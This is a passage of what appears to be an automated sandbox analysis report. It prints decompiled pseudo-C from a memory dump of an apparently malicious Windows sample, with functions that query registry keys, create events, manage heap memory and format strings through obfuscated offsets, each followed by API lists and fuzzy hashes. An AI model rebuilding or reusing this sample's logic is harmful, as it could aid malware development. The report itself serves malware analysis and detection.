                                                        					_t39 = _a8;
                                                        					L13:
                                                        					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                                        						_t23 =  &(_t39[1]);
                                                        						if(_t39[1] != 0) {
                                                        							E01203625(_t23);
                                                        						}
                                                        					}
                                                        					return _t38;
                                                        				}
                                                        				_t26 = E0120249F(0x40,  &_v16); // executed
                                                        				if(_t26 != 0) {
                                                        					_v16 = 0;
                                                        				}
                                                        				_t40 = CreateEventA(0x120a2f8, 1, 0,  *0x120a394);
                                                        				if(_t40 != 0) {
                                                        					SetEvent(_t40);
                                                        					Sleep(0xbb8); // executed
                                                        					CloseHandle(_t40);
                                                        				}
                                                        				_push( &_v32);
                                                        				if(_a12 == 0) {
                                                        					_t29 = E01203D85(_t36); // executed
                                                        				} else {
                                                        					_push(0);
                                                        					_push(0);
                                                        					_push(0);
                                                        					_push(0);
                                                        					_push(0);
                                                        					_t29 = E01205448(_t36);
                                                        				}
                                                        				_t41 = _v16;
                                                        				_t38 = _t29;
                                                        				if(_v16 != 0) {
                                                        					E0120243E(_t41);
                                                        				}
                                                        				if(_t38 != 0) {
                                                        					goto L12;
                                                        				} else {
                                                        					_t39 = _a8;
                                                        					_t38 = E01204BAC( &_v32, _t39);
                                                        					goto L13;
                                                        				}
                                                        			}

                                                        APIs
                                                        • CreateEventA.KERNEL32(0120A2F8,00000001,00000000,00000040,?,?,74B5F710,00000000,74B5F730,?,?,?,?,0120519C,?,00000001), ref: 0120751C
                                                        • SetEvent.KERNEL32(00000000,?,?,?,?,0120519C,?,00000001,01204579,00000002,?,?,01204579), ref: 01207529
                                                        • Sleep.KERNELBASE(00000BB8,?,?,?,?,0120519C,?,00000001,01204579,00000002,?,?,01204579), ref: 01207534
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,0120519C,?,00000001,01204579,00000002,?,?,01204579), ref: 0120753B
                                                          • Part of subcall function 01203D85: RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,0120755B,?), ref: 01203DAB
                                                          • Part of subcall function 01203D85: RegEnumKeyExA.KERNELBASE(?,?,?,0120755B,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,0120755B), ref: 01203DF2
                                                          • Part of subcall function 01203D85: WaitForSingleObject.KERNEL32(00000000,?,?,?,0120755B,?,0120755B,?,?,?,?,?,0120755B,?), ref: 01203E5F
                                                          • Part of subcall function 01203D85: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,0120755B,?,?,?,?,?,0120519C,?), ref: 01203E87
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: CloseEvent$CreateEnumHandleObjectOpenSingleSleepWait
                                                        • String ID:
                                                        • API String ID: 891522397-0
                                                        • Opcode ID: 653087418e9ea925f5aa4ec9fd9516dcd020bede91d8b96d33771435220af5cc
                                                        • Instruction ID: e4d02fc2c7e9db2e07f2be103af6033d96a1f12fabc5b171f9f0aa6c6f7f1e37
                                                        • Opcode Fuzzy Hash: 653087418e9ea925f5aa4ec9fd9516dcd020bede91d8b96d33771435220af5cc
                                                        • Instruction Fuzzy Hash: C321DA72D10256ABDF23AFE8A4848EE7B79AF44250F014629FF55A7182D731F940CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E01203B91(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
                                                        				long _t26;
                                                        				intOrPtr* _t38;
                                                        				char* _t42;
                                                        				long _t43;
                                                        
                                                        				if(_a4 == 0) {
                                                        					L2:
                                                        					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
                                                        					_t43 = _t26;
                                                        					if(_t43 == 0) {
                                                        						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
                                                        						if(_a4 == 0) {
                                                        							_t43 = 0xe8;
                                                        						} else {
                                                        							_t42 = E01205FBC(_a4);
                                                        							if(_t42 == 0) {
                                                        								_t43 = 8;
                                                        							} else {
                                                        								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
                                                        								if(_t43 != 0) {
                                                        									E012013CC(_t42);
                                                        								} else {
                                                        									 *_a20 = _t42;
                                                        									_t38 = _a24;
                                                        									if(_t38 != 0) {
                                                        										 *_t38 = _a4;
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						RegCloseKey(_a12);
                                                        					}
                                                        					L12:
                                                        					return _t43;
                                                        				}
                                                        				_t43 = E012031D9(_a4, _a8, _a12, _a16, _a20, _a24);
                                                        				if(_t43 == 0) {
                                                        					goto L12;
                                                        				}
                                                        				goto L2;
                                                        			}

                                                        APIs
                                                        • RegOpenKeyW.ADVAPI32(80000002,05769DC4,05769DC4), ref: 01203BCA
                                                        • RegQueryValueExW.KERNELBASE(05769DC4,?,00000000,80000002,00000000,00000000,?,01205527,3D012090,80000002,0120755B,00000000,0120755B,?,05769DC4,80000002), ref: 01203BEC
                                                        • RegQueryValueExW.ADVAPI32(05769DC4,?,00000000,80000002,00000000,00000000,00000000,?,01205527,3D012090,80000002,0120755B,00000000,0120755B,?,05769DC4), ref: 01203C11
                                                        • RegCloseKey.ADVAPI32(05769DC4,?,01205527,3D012090,80000002,0120755B,00000000,0120755B,?,05769DC4,80000002,00000000,?), ref: 01203C41
                                                          • Part of subcall function 012031D9: SafeArrayDestroy.OLEAUT32(00000000), ref: 0120325E
                                                          • Part of subcall function 012013CC: RtlFreeHeap.NTDLL(00000000,00000000,012020F3,00000000,00000000,?,00000000,?,?,?,?,?,012068A9,00000000,?,00000001), ref: 012013D8
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
                                                        • String ID:
                                                        • API String ID: 486277218-0
                                                        • Opcode ID: ae002feb951d61d5abff917e8292559e58f0459effe929c1a4db8c6ef40b51bc
                                                        • Instruction ID: 4924fbd107d73be0c3e27be8c5f5f6f0bd6bf1a8f8e6cf75e99fb8d2402c790e
                                                        • Opcode Fuzzy Hash: ae002feb951d61d5abff917e8292559e58f0459effe929c1a4db8c6ef40b51bc
                                                        • Instruction Fuzzy Hash: B7212A7201015EAFDF12EF95DC80CEE7B69FB08250B048225FE1597161D3319D649B90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 18%
                                                        			E0120142C(void* __esi) {
                                                        				signed int _v8;
                                                        				long _v12;
                                                        				char _v16;
                                                        				long* _v20;
                                                        				long _t36;
                                                        				long* _t47;
                                                        				intOrPtr* _t62;
                                                        				intOrPtr* _t63;
                                                        				char* _t64;
                                                        
                                                        				_t36 =  *((intOrPtr*)(__esi + 0x28));
                                                        				_t62 = __esi + 0x2c;
                                                        				_v16 = 0;
                                                        				 *_t62 = 0;
                                                        				_v12 = _t36;
                                                        				if(_t36 != 0) {
                                                        					L12:
                                                        					return _v12;
                                                        				}
                                                        				_v8 = 4;
                                                        				__imp__( *((intOrPtr*)(__esi + 0x18)), 0); // executed
                                                        				if(_t36 == 0) {
                                                        					L11:
                                                        					_v12 = GetLastError();
                                                        					goto L12;
                                                        				}
                                                        				_push( &_v16);
                                                        				_push( &_v8);
                                                        				_push(_t62);
                                                        				_t63 = __imp__; // 0x7029fd20
                                                        				_push(0);
                                                        				_push(0x20000013);
                                                        				_push( *((intOrPtr*)(__esi + 0x18)));
                                                        				if( *_t63() == 0) {
                                                        					goto L11;
                                                        				} else {
                                                        					_v16 = 0;
                                                        					_v8 = 0;
                                                        					 *_t63( *((intOrPtr*)(__esi + 0x18)), 0x16, 0, 0,  &_v8,  &_v16);
                                                        					_t47 = E01205FBC(_v8 + 2);
                                                        					_v20 = _t47;
                                                        					if(_t47 == 0) {
                                                        						_v12 = 8;
                                                        					} else {
                                                        						_push( &_v16);
                                                        						_push( &_v8);
                                                        						_push(_t47);
                                                        						_push(0);
                                                        						_push(0x16);
                                                        						_push( *((intOrPtr*)(__esi + 0x18)));
                                                        						if( *_t63() == 0) {
                                                        							_v12 = GetLastError();
                                                        						} else {
                                                        							_v8 = _v8 >> 1;
                                                        							 *((short*)(_v20 + _v8 * 2)) = 0;
                                                        							_t64 = E01205FBC(_v8 + 1);
                                                        							if(_t64 == 0) {
                                                        								_v12 = 8;
                                                        							} else {
                                                        								wcstombs(_t64, _v20, _v8 + 1);
                                                        								 *(__esi + 0xc) = _t64;
                                                        							}
                                                        						}
                                                        						E012013CC(_v20);
                                                        					}
                                                        					goto L12;
                                                        				}
                                                        			}

                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 0120151E
                                                          • Part of subcall function 01205FBC: RtlAllocateHeap.NTDLL(00000000,00000000,01202035), ref: 01205FC8
                                                        • wcstombs.NTDLL ref: 012014EC
                                                        • GetLastError.KERNEL32 ref: 01201502
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
• Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
• Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
• Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
• Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: ErrorLast$AllocateHeapwcstombs
                                                        • String ID:
                                                        • API String ID: 2631933831-0
                                                        • Opcode ID: df13acccafdab3f7a4828e862d2d127e0a5cb793411386401c566639809deda5
                                                        • Instruction ID: 372954babe1b14e3d93d32bbe9eed7711445b7a84cf7a3cd38b9b8c5991223bb
                                                        • Opcode Fuzzy Hash: df13acccafdab3f7a4828e862d2d127e0a5cb793411386401c566639809deda5
                                                        • Instruction Fuzzy Hash: 38317EB5910209FFEB22DF94D884DAEFBB8FF18304F144659E502E3292D771DA548B20
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E01205335(void* __edx) {
                                                        				void* _v8;
                                                        				int _v12;
                                                        				WCHAR* _v16;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				void* _t23;
                                                        				intOrPtr _t24;
                                                        				void* _t26;
                                                        				intOrPtr _t32;
                                                        				intOrPtr _t35;
                                                        				void* _t37;
                                                        				intOrPtr _t38;
                                                        				void* _t40;
                                                        				intOrPtr _t42;
                                                        				void* _t45;
                                                        				void* _t50;
                                                        				void* _t52;
                                                        
                                                        				_t50 = __edx;
                                                        				_v12 = 0;
                                                        				_t23 = E0120249F(0,  &_v8); // executed
                                                        				if(_t23 != 0) {
                                                        					_v8 = 0;
                                                        				}
                                                        				_t24 =  *0x120a2d4; // 0x455d5a8
                                                        				_t4 = _t24 + 0x120bd70; // 0x5769318
                                                        				_t5 = _t24 + 0x120bd18; // 0x4f0053
                                                        				_t26 = E012011B0( &_v16, _v8, _t5, _t4); // executed
                                                        				_t45 = _t26;
                                                        				if(_t45 == 0) {
                                                        					StrToIntExW(_v16, 0,  &_v12);
                                                        					_t45 = 8;
                                                        					if(_v12 < _t45) {
                                                        						_t45 = 1;
                                                        						__eflags = 1;
                                                        					} else {
                                                        						_t32 =  *0x120a2d4; // 0x455d5a8
                                                        						_t11 = _t32 + 0x120bd64; // 0x576930c
                                                        						_t48 = _t11;
                                                        						_t12 = _t32 + 0x120bd18; // 0x4f0053
                                                        						_t52 = E01201370(_t11, _t12, _t11);
                                                        						_t59 = _t52;
                                                        						if(_t52 != 0) {
                                                        							_t35 =  *0x120a2d4; // 0x455d5a8
                                                        							_t13 = _t35 + 0x120bdae; // 0x30314549
                                                        							_t37 = E0120609A(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
                                                        							if(_t37 == 0) {
                                                        								_t61 =  *0x120a2b4 - 6;
                                                        								if( *0x120a2b4 <= 6) {
                                                        									_t42 =  *0x120a2d4; // 0x455d5a8
                                                        									_t15 = _t42 + 0x120bbba; // 0x52384549
                                                        									E0120609A(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                                                        								}
                                                        							}
                                                        							_t38 =  *0x120a2d4; // 0x455d5a8
                                                        							_t17 = _t38 + 0x120bda8; // 0x5769350
                                                        							_t18 = _t38 + 0x120bd80; // 0x680043
                                                        							_t40 = E0120304F(_v8, 0x80000001, _t52, _t18, _t17); // executed
                                                        							_t45 = _t40;
                                                        							HeapFree( *0x120a290, 0, _t52);
                                                        						}
                                                        					}
                                                        					HeapFree( *0x120a290, 0, _v16);
                                                        				}
                                                        				_t54 = _v8;
                                                        				if(_v8 != 0) {
                                                        					E0120243E(_t54);
                                                        				}
                                                        				return _t45;
                                                        			}

                                                        APIs
                                                        • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05769318,00000000,?,74B5F710,00000000,74B5F730), ref: 01205384
                                                        • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05769350,?,00000000,30314549,00000014,004F0053,0576930C), ref: 01205421
                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,01205131), ref: 01205433
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
• Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
• Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
• Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
• Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID:
                                                        • API String ID: 3298025750-0
                                                        • Opcode ID: 5df14c1c4202ef62e97752e6a70a4b711ecdc7b99ebfd6a090d28c930e012de7
                                                        • Instruction ID: fb218d73e9a0b6ff6e0203d8f4e3a2049f18d483b430415bd283c5d859ef54ff
                                                        • Opcode Fuzzy Hash: 5df14c1c4202ef62e97752e6a70a4b711ecdc7b99ebfd6a090d28c930e012de7
                                                        • Instruction Fuzzy Hash: 9D31A13161021ABFDB23DFA4ED88EEE7BBDEB48700F510265F604A7093D6719A08DB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 91%
                                                        			E01205242(intOrPtr* __eax, void* __ecx, void* __edx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
                                                        				void* _v8;
                                                        				char _v48;
                                                        				void* __edi;
                                                        				intOrPtr _t22;
                                                        				long _t29;
                                                        				intOrPtr _t33;
                                                        				intOrPtr* _t41;
                                                        				void* _t42;
                                                        				void* _t46;
                                                        				intOrPtr* _t47;
                                                        				void* _t48;
                                                        				intOrPtr _t50;
                                                        
                                                        				_t46 = __edx;
                                                        				_t42 = __ecx;
                                                        				_t41 = _a16;
                                                        				_t47 = __eax;
                                                        				_t22 =  *0x120a2d4; // 0x455d5a8
                                                        				_t2 = _t22 + 0x120b671; // 0x657a6973
                                                        				wsprintfA( &_v48, _t2,  *__eax,  *_t41);
                                                        				if( *0x120a2a4 >= 5) {
                                                        					_push( &_a16);
                                                        					_push( &_v8);
                                                        					_push( &_v48);
                                                        					_t29 = _a4;
                                                        					"QQSUVWh"();
                                                        					L5:
                                                        					_a4 = _t29;
                                                        					L6:
                                                        					if(_a4 != 0) {
                                                        						L9:
                                                        						 *0x120a2a4 =  *0x120a2a4 + 1;
                                                        						L10:
                                                        						return _a4;
                                                        					}
                                                        					_t49 = _a16;
                                                        					 *_t47 = _a16;
                                                        					_t48 = _v8;
                                                        					 *_t41 = E012056BF(_t49, _t48); // executed
                                                        					_t33 = E01206997(_t48, _t49); // executed
                                                        					if(_t33 != 0) {
                                                        						 *_a8 = _t48;
                                                        						 *_a12 = _t33;
                                                        						if( *0x120a2a4 < 5) {
                                                        							 *0x120a2a4 =  *0x120a2a4 & 0x00000000;
                                                        						}
                                                        						goto L10;
                                                        					}
                                                        					_a4 = 0xbf;
                                                        					E01203546();
                                                        					HeapFree( *0x120a290, 0, _t48);
                                                        					goto L9;
                                                        				}
                                                        				_t50 =  *0x120a390; // 0x5768d6c
                                                        				if(RtlAllocateHeap( *0x120a290, 0, 0x800) == 0) {
                                                        					_a4 = 8;
                                                        					goto L6;
                                                        				}
                                                        				_t29 = E0120254C(_a4, _t42, _t46, _t50,  &_v48,  &_v8,  &_a16, _t36);
                                                        				goto L5;
                                                        			}

                                                        APIs
                                                        • wsprintfA.USER32 ref: 01205264
                                                        • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 01205289
                                                          • Part of subcall function 0120254C: GetTickCount.KERNEL32 ref: 01202563
                                                          • Part of subcall function 0120254C: wsprintfA.USER32 ref: 012025B0
                                                          • Part of subcall function 0120254C: wsprintfA.USER32 ref: 012025CD
                                                          • Part of subcall function 0120254C: wsprintfA.USER32 ref: 012025ED
                                                          • Part of subcall function 0120254C: wsprintfA.USER32 ref: 0120260B
                                                          • Part of subcall function 0120254C: wsprintfA.USER32 ref: 0120262E
                                                          • Part of subcall function 0120254C: wsprintfA.USER32 ref: 0120264F
                                                        • HeapFree.KERNEL32(00000000,0120517B,?,?,0120517B,?), ref: 01205303
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
• Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
• Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
• Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
• Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: wsprintf$Heap$AllocateCountFreeTick
                                                        • String ID:
                                                        • API String ID: 2794511967-0
                                                        • Opcode ID: 869792b6d2f837a4b581c518fc202f6095275b48150f0061139b0145fe8d2e1c
                                                        • Instruction ID: 6b7cb7a1d52d77efd9656f00c7d0cb4d5fa76a6a4af4275a44b65917ee29e2c6
                                                        • Opcode Fuzzy Hash: 869792b6d2f837a4b581c518fc202f6095275b48150f0061139b0145fe8d2e1c
                                                        • Instruction Fuzzy Hash: BF314F72510219EFDB13DF64E888A9A3BBDFF48344F104222F906AB282D7719654CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 79%
                                                        			E012015AB(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
                                                        				char _v5;
                                                        				signed int _v12;
                                                        				intOrPtr _v16;
                                                        				char _t28;
                                                        				void* _t33;
                                                        				void* _t38;
                                                        				void* _t45;
                                                        				char* _t46;
                                                        				void* _t48;
                                                        				char* _t56;
                                                        				char* _t57;
                                                        				intOrPtr _t59;
                                                        				void* _t60;
                                                        
                                                        				_t56 = _a4;
                                                        				_t60 = __eax;
                                                        				_v12 = 0xb;
                                                        				if(_t56 != 0 && __eax != 0) {
                                                        					_t5 = _t60 - 1; // -1
                                                        					_t46 =  &(_t56[_t5]);
                                                        					_t28 =  *_t46;
                                                        					_v5 = _t28;
                                                        					 *_t46 = 0;
                                                        					__imp__(_a8, _t45);
                                                        					_v16 = _t28;
                                                        					_t57 = StrStrA(_t56, _a8);
                                                        					if(_t57 != 0) {
                                                        						 *_t46 = _v5;
                                                        						_t33 = RtlAllocateHeap( *0x120a290, 0, _a16 + _t60); // executed
                                                        						_t48 = _t33;
                                                        						if(_t48 == 0) {
                                                        							_v12 = 8;
                                                        						} else {
                                                        							_t58 = _t57 - _a4;
                                                        							E012077FF(_t57 - _a4, _a4, _t48);
                                                        							_t38 = E012077FF(_a16, _a12, _t58 + _t48);
                                                        							_t53 = _v16;
                                                        							_t59 = _a16;
                                                        							E012077FF(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
                                                        							 *_a20 = _t48;
                                                        							_v12 = _v12 & 0x00000000;
                                                        							 *_a24 = _t60 - _v16 + _t59;
                                                        						}
                                                        					}
                                                        				}
                                                        				return _v12;
                                                        			}

                                                        APIs
                                                        • lstrlen.KERNEL32(74B5F710,?,00000000,?,74B5F710), ref: 012015DF
                                                        • StrStrA.SHLWAPI(00000000,?), ref: 012015EC
                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 0120160B
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: AllocateHeaplstrlen
                                                        • String ID:
                                                        • API String ID: 556738718-0
                                                        • Opcode ID: 47b651867819d2aa0ae3a64481f1a2db155a4c1fd1a1c71d4761553ce1933b3a
                                                        • Instruction ID: 142a386b9ad9675756a4b97a418942185e06c4758351a0815a01cc9b6d73361c
                                                        • Opcode Fuzzy Hash: 47b651867819d2aa0ae3a64481f1a2db155a4c1fd1a1c71d4761553ce1933b3a
                                                        • Instruction Fuzzy Hash: 4821513560024AAFCB12DF6CD884B9EBFB5EF85354F088255E94497346C770E915CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E01206793(void* __ecx, void* __eflags) {
                                                        				char _v8;
                                                        				void* _v12;
                                                        				int _v16;
                                                        				int _v20;
                                                        				intOrPtr _t15;
                                                        				intOrPtr _t19;
                                                        				long _t24;
                                                        				long _t29;
                                                        				short* _t31;
                                                        				short* _t34;
                                                        
                                                        				_t15 =  *0x120a2d4; // 0x455d5a8
                                                        				_v8 = _v8 & 0x00000000;
                                                        				_t3 = _t15 + 0x120ba40; // 0x4f0053
                                                        				_v16 = 4;
                                                        				_t31 = E01207206(__ecx, _t3);
                                                        				if(_t31 != 0) {
                                                        					_t19 =  *0x120a2d4; // 0x455d5a8
                                                        					_t5 = _t19 + 0x120ba9c; // 0x6e0049
                                                        					_t34 = E01207206(__ecx, _t5);
                                                        					if(_t34 != 0) {
                                                        						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
                                                        						if(_t24 == 0) {
                                                        							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
                                                        							if(_t29 != 0) {
                                                        								_v8 = _v8 & 0x00000000;
                                                        							}
                                                        							RegCloseKey(_v12);
                                                        						}
                                                        						E012013CC(_t34);
                                                        					}
                                                        					E012013CC(_t31);
                                                        				}
                                                        				return _v8;
                                                        			}

                                                        0x01206799 0x0120679e 0x012067a3 0x012067aa 0x012067b6 0x012067ba 0x012067bc 0x012067c2 0x012067ce 0x012067d2 0x012067e5 0x012067ed 0x01206801 0x01206809 0x0120680b 0x0120680b 0x01206812 0x01206812 0x01206819 0x01206819 0x0120681f 0x01206824 0x0120682a

                                                        APIs
                                                          • Part of subcall function 01207206: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,012067B6,004F0053,00000000,?), ref: 0120720F
                                                          • Part of subcall function 01207206: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,012067B6,004F0053,00000000,?), ref: 01207239
                                                          • Part of subcall function 01207206: memset.NTDLL ref: 0120724D
                                                        • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 012067E5
                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 01206801
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 01206812
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: CloseOpenQueryValuelstrlenmemcpymemset
                                                        • String ID:
                                                        • API String ID: 830012212-0
                                                        • Opcode ID: 794674be5866532c2241e095021fb48634ea7e5f5514ad46de81192859d7cdba
                                                        • Instruction ID: fc2292e743a589a3b411bd3ae1112cf8055707655f8aa123541e0d7bf18513e0
                                                        • Opcode Fuzzy Hash: 794674be5866532c2241e095021fb48634ea7e5f5514ad46de81192859d7cdba
                                                        • Instruction Fuzzy Hash: E011127651020ABFE723DBD8DC89FAE77BCAB44604F144255E605E7087EB70D6189B60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E012041D4(void* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                        				int _v12;
                                                        				signed int _v16;
                                                        				void* _v20;
                                                        				signed char _v36;
                                                        				void* _t24;
                                                        				intOrPtr _t27;
                                                        				void* _t35;
                                                        				signed int _t38;
                                                        				signed char* _t46;
                                                        				int _t53;
                                                        				void* _t55;
                                                        				void* _t56;
                                                        				void* _t57;
                                                        
                                                        				_v16 = _v16 & 0x00000000;
                                                        				_t46 = _a4;
                                                        				_t53 = ( *_t46 & 0x000000ff) + 0x110;
                                                        				_v12 = 0x110;
                                                        				_t24 = E01205FBC(_t53);
                                                        				_a4 = _t24;
                                                        				if(_t24 != 0) {
                                                        					memcpy(_t24,  *0x120a324, 0x110);
                                                        					_t27 =  *0x120a328; // 0x0
                                                        					_t57 = _t56 + 0xc;
                                                        					if(_t27 != 0) {
                                                        						_t51 = _a4;
                                                        						E012076A8(0x110, _a4, _a4, _t27, 0);
                                                        					}
                                                        					if(E0120773D( &_v36) != 0) {
                                                        						_t35 = E01203276(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
                                                        						if(_t35 == 0) {
                                                        							_t55 = _v20;
                                                        							_v36 =  *_t46;
                                                        							_t38 = E01202879(_t55, _a8, _t51, _t46, _a12); // executed
                                                        							_v16 = _t38;
                                                        							 *(_t55 + 4) = _v36;
                                                        							_t20 =  &(_t46[4]); // 0x8b4875fc
                                                        							memset(_t55, 0, _v12 - ( *_t20 & 0xf));
                                                        							_t57 = _t57 + 0xc;
                                                        							E012013CC(_t55);
                                                        						}
                                                        					}
                                                        					memset(_a4, 0, _t53);
                                                        					E012013CC(_a4);
                                                        				}
                                                        				return _v16;
                                                        			}

                                                        0x012041da 0x012041df 0x012041ec 0x012041ef 0x012041f2 0x012041f9 0x012041fc 0x0120420a 0x0120420f 0x01204214 0x01204219 0x0120421b 0x01204224 0x01204224 0x01204233 0x01204248 0x0120424f 0x01204256 0x0120425c 0x01204262 0x0120426a 0x01204270 0x01204273 0x01204280 0x01204285 0x01204289 0x01204289 0x0120424f 0x01204294 0x0120429f 0x0120429f 0x012042ab

                                                        APIs
                                                          • Part of subcall function 01205FBC: RtlAllocateHeap.NTDLL(00000000,00000000,01202035), ref: 01205FC8
                                                        • memcpy.NTDLL(00000000,00000110,0120517B,0120517B,?,?,0120517B,?,?,012052EA,?), ref: 0120420A
                                                        • memset.NTDLL ref: 01204280
                                                        • memset.NTDLL ref: 01204294
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: memset$AllocateHeapmemcpy
                                                        • String ID:
                                                        • API String ID: 1529149438-0
                                                        • Opcode ID: a88525bff3d82456582db863ff1c666ce9816318511fc53f7dce80d9041ac4af
                                                        • Instruction ID: 55b13dcfde1d36225a5d7f8d352e99bb223fed44e8d16a952684a0065b21bc66
                                                        • Opcode Fuzzy Hash: a88525bff3d82456582db863ff1c666ce9816318511fc53f7dce80d9041ac4af
                                                        • Instruction Fuzzy Hash: 58214175A10619BFDF12EF99DC40FAEBBB8AF18640F044115FA04E7296D774D6508BA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 38%
                                                        			E01203686(intOrPtr _a4) {
                                                        				void* _v12;
                                                        				void* _v16;
                                                        				void* _v20;
                                                        				void* _v24;
                                                        				void* _v28;
                                                        				char _v32;
                                                        				intOrPtr _v40;
                                                        				void* _v46;
                                                        				short _v48;
                                                        				intOrPtr _t49;
                                                        				void* _t51;
                                                        				intOrPtr* _t53;
                                                        				intOrPtr _t56;
                                                        				void* _t58;
                                                        				intOrPtr* _t59;
